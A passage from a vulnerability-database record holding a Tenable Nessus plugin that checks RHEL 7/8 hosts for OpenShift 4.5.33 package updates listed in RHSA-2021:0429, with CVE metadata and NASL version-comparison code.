Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.0, "vector": "AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://bugzilla.redhat.com/1921322", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/errata/RHSA-2021:0429", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-03-07T06:00:11", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-03-07T06:00:11", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "type": "cve"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["ASA-202005-15", "ASA-202101-41", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}, {"idList": ["RHSA-2021:0429", "RHSA-2020:4961", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2021:0719", "RHSA-2020:2618"], "type": "redhat"}, {"idList": ["PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "JENKINS_2_276.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-03-07T06:00:11", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/05\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.1::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.1::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.2::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.2::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.6::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.6::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.7::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.7::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_1_el7': [\n 'rhel-7-server-ose-4.1-debug-rpms',\n 'rhel-7-server-ose-4.1-rpms',\n 'rhel-7-server-ose-4.1-source-rpms'\n ],\n 'openshift_4_1_el8': [\n 'rhocp-4.1-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_2_el7': [\n 'rhel-7-for-system-z-ose-4.2-debug-rpms',\n 'rhel-7-for-system-z-ose-4.2-rpms',\n 'rhel-7-for-system-z-ose-4.2-source-rpms',\n 'rhel-7-server-ose-4.2-debug-rpms',\n 'rhel-7-server-ose-4.2-rpms',\n 'rhel-7-server-ose-4.2-source-rpms'\n ],\n 'openshift_4_2_el8': [\n 'rhocp-4.2-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_3_el7': [\n 'rhel-7-for-system-z-ose-4.3-debug-rpms',\n 'rhel-7-for-system-z-ose-4.3-rpms',\n 'rhel-7-for-system-z-ose-4.3-source-rpms',\n 'rhel-7-server-ose-4.3-debug-rpms',\n 'rhel-7-server-ose-4.3-rpms',\n 'rhel-7-server-ose-4.3-source-rpms'\n ],\n 'openshift_4_3_el8': [\n 'rhocp-4.3-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_4_el7': [\n 'rhel-7-for-system-z-ose-4.4-debug-rpms',\n 'rhel-7-for-system-z-ose-4.4-rpms',\n 'rhel-7-for-system-z-ose-4.4-source-rpms',\n 'rhel-7-server-ose-4.4-debug-rpms',\n 'rhel-7-server-ose-4.4-rpms',\n 'rhel-7-server-ose-4.4-source-rpms'\n ],\n 'openshift_4_4_el8': [\n 'rhocp-4.4-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_6_el7': [\n 'rhel-7-for-system-z-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-debug-rpms',\n 'rhel-7-server-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-source-rpms'\n ],\n 'openshift_4_6_el8': [\n 'rhocp-4.6-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_7_el7': [\n 'rhel-7-for-system-z-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-debug-rpms',\n 'rhel-7-server-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-source-rpms'\n ],\n 'openshift_4_7_el8': [\n 'rhocp-4.7-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0429');\n}\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if 